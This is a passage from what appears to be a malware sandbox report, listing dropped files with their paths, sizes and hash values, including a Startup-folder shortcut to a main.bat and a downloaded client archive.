85ad58c8ee014e04528a8c64da4168abe58b46f48a109fb4c20305da26e30a8a

SHA512
549d69b58139c4e911d6d20b7f5ea6814834ad54590e2febe3b1bdc2d9a58f19b05d19c1a803287998194356d5d7b663929ec304a0709e50738e136903a4ea96

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57d580.TMP

Filesize
1KB

MD5
798f38beeeef582c8cc66379157b6071

SHA1
e9a8268f3b82e0ab629903719d47c15d19159085

SHA256
7415ffeee1b653e7ec6be8417899fb7fb06455a2ff575a2820e40458274237ae

SHA512
481422d37b3a9dc9b4e09dc498d3fc41d05d0316dc2c4fcd1860002bc482a21a89a3b14cd5d22e83b3572672526dde3eddb201db9f3ea1c8e5402e19fd998055

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
9b16fae22b1ac1f669ae485eb65490ec

SHA1
a22466dd876ebb7bf8e45fd73c25a83ffba33f05

SHA256
5ab90806ba0161cfb7ba597ffd99ca718cde553a63ca660f17401c2547c89499

SHA512
eef961215b86e89482f02f615eff576057ea41fd2b94180dbd7793f21064e799d79b392c038e17027a0b805f482ff6a26cef74a84163cfafb5034e0100564606

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
ad5eb18dcd0eb3485d5f819442919308

SHA1
5ad0b32343883bd70777b7633dff8cd08a6de98a

SHA256
8016a97671ac84b68103ce713a3d2be23cf43cf1cba49a160ec66c63cc97e5d0

SHA512
b2c86f157d3a700c3778bc334c3ab8b3ccadcc1231c9a14b961641e37bf6b0cbac4dd3ffdc4f632e34e2fe83c71d80da72edbe63d20bee2102f31274c61cfce7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
08f9f3eb63ff567d1ee2a25e9bbf18f0

SHA1
6bf06056d1bb14c183490caf950e29ac9d73643a

SHA256
82147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0

SHA512
425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
59583cecd69c4401d92a7a17a16f194b

SHA1
6134e6c5ec66c755f1537dd984c66b293a207a46

SHA256
b3804330d219ae8b7ab3c7b36329b611f8e2c69e90fc86d77760b18d8428f6a6

SHA512
084a905d9543be8af45126ff5bd40db819f7cddee9db7618eb42c1229145b944ebd8c61696ac7ec617bd0e55152931bf964b6af01018e9bfce964b4e16121e32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3bc3d3f73fc81d9d1a8a4b17192aa35a

SHA1
d017d278395183edb0db4a301dacc57285d59a5c

SHA256
934a29e6c90140621824a91cd5d60a3c42a62207ad3fa4d6581ad2a6310cf614

SHA512
bf8c596f6c109bd6d932696c65c46f054033ffd3e39433ac69a3d6e91a0c28dfd73ca5a75a206ac1707a2b6cb57ba2b44ee8fadca2aad584439f280617d42134

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jv0opwmz.qdp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.bat.lnk

Filesize
901B

MD5
0645133445ee2724f7de52e6e8ce5557

SHA1
10c6f7949e65e860556beba8e616012f02f06414

SHA256
4f67cc12ebb1b23fd5cbd79c951ee926adc5b3cb96f7b00a491a6af3abbccb83

SHA512
52f9edce27f61ebda687ac49232c585c0f84cb1e7d9e1a0843b22b0c08eca379f813d9e00b75c9c0fddd256ae7235a1655f5696c0e7b474e97d8fb168bef19fe

Download Submit
C:\Users\Admin\Downloads\client-20240808T201822Z-001.zip

Filesize
1.0MB

MD5
b32dc73e96b8dd2e049325cafe3d8c60

SHA1
438a0c9747080afd1c65c416d3a5605efd2d66a6

SHA256
e60104d183b078ffcd06775fbd050ff3c61dd6eddc8646bfdecf8fa0534f21a6

SHA512
1f165d5d46ff904e91cc5207c3d365883e858d592d78b42895a0386269b87877fdcc63ea906ed49fe7d17ad454b86c8ece26ed0c5cb02a4df76d9f600150cc1c

Download Submit
C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat

Filesize
937B

MD5
2b1a9c7751f1d71c818d3765d8cf5f30

SHA1
dc3466045943f5ed50d0488080ea3a002eed4448

SHA256
da58dedd364278475a9d14871af24d0049604deb1c57cd44fbfe68a5a365254a

SHA512
41a3b12ab2524679098c545815ddd7430a21ed5846421b730205118d75e0972423074c8147013a04300d6967973bfd6cc0c3638dc27a3e68384efb93b698528c

Download Submit
memory/2824-205-0x000002124D850000-0x000002124D872000-memory.dmp

Filesize
136KB

Download